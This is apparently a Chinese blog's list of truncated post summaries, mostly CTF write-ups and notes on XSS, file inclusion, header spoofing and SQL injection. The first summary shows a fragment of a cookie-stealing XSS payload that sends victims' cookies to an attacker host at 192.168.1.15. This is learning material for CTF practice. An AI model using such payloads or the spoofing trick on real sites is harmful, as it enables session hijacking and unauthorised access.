A思

摘要： cookie获取xss后台使用 引发用户点击特制url（比如告诉用户这是优惠网）,用户点击后进入攻击者指定的自己的页面，返回用户的cookie到攻击者的后台 <script> document .location='http://192.168.1.15/pkxss/xcookie/cookie.p 阅读全文

摘要： linux基础 解压得到文件flag，用winhes，记事本打开没有任何信息 在kali里用strings flag命令得到flag strings命令在对象文件或二进制文件中查找可打印的字符串。字符串是4个或更多可打印字符的任意序列，以换行符或空字符结束。 strings命令对识别随机对象文件很有 阅读全文

摘要： python 脚本跑出源码（见另一篇随笔） 读源码，构造cookie bp抓包，添加cookie :margin=margin 注意url，filename=keys.php keys.php要用base64加密传输， 阅读全文

摘要： 看了很多writeup txt文件里面有很多列ttl值，63,127,191,255 63==》 00111111 127==》01111111 191==》10111111 255==》11111111 变得只有前面两位，后面6位不变，如果传输4个就是一字节 取前面的2位组成8位，对照二进制字母表 阅读全文

摘要： bugku-速度要快 #-*- coding:utf-8-*- import requests //get，post方法import base64 //base64加解密模块url="http://xxx.ddd.dg:8002/web6/"r=requests.session() //创建sess 阅读全文

摘要： 做ctf时，看到网页地址是xxxxx/index.php?file=show.php就想到了文件包含漏洞 总结 1， phpinfo.txt文件是什么？有什么用？ 新建一个phpinfo.txt，然后新建一个shell.php，写入： <?php Include("phpinfo.txt"); ?> 阅读全文

摘要： 我看源码没有看到别人说的base64解密文，原来是在F12中打开所有下拉项，出现在最后，之间看源码是没有的 解密后得到test123，尝试密码：test123,用户：admin,(这是猜测） 大佬的思路：‘联系本地管理员登录’，本地！能否伪造本地？ 用X-Forwarded-For:127.0.0. 阅读全文

摘要： <?php error_reporting(0); 关闭php错误提示include "flag1.php";highlight_file(__file__);if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+ 阅读全文

摘要： 1、如何快速判断网站的操作系统 摘自：https://www.exehack.net/43.html 目前apache和LINUX搭配用的最多，腾讯的就是；如果web服务器是iis，那他就是windows 服务器， 如果是apache和其他的，那就不好猜测了，apache可以运行在windows ， 阅读全文

摘要： sql注入 1 、sql注入产生的原因？又如何防御sql注入？ 1）.sql注入产生的原因：程序开发过程中不注意书写规范，对sql语句和关键字（输入框）未进行过滤，导致客户端可以通过全局变量get或者post提交sql语句到服务器端正常运行; 2）.防止过滤： 过滤掉一些常见的数据库关键字：sele 阅读全文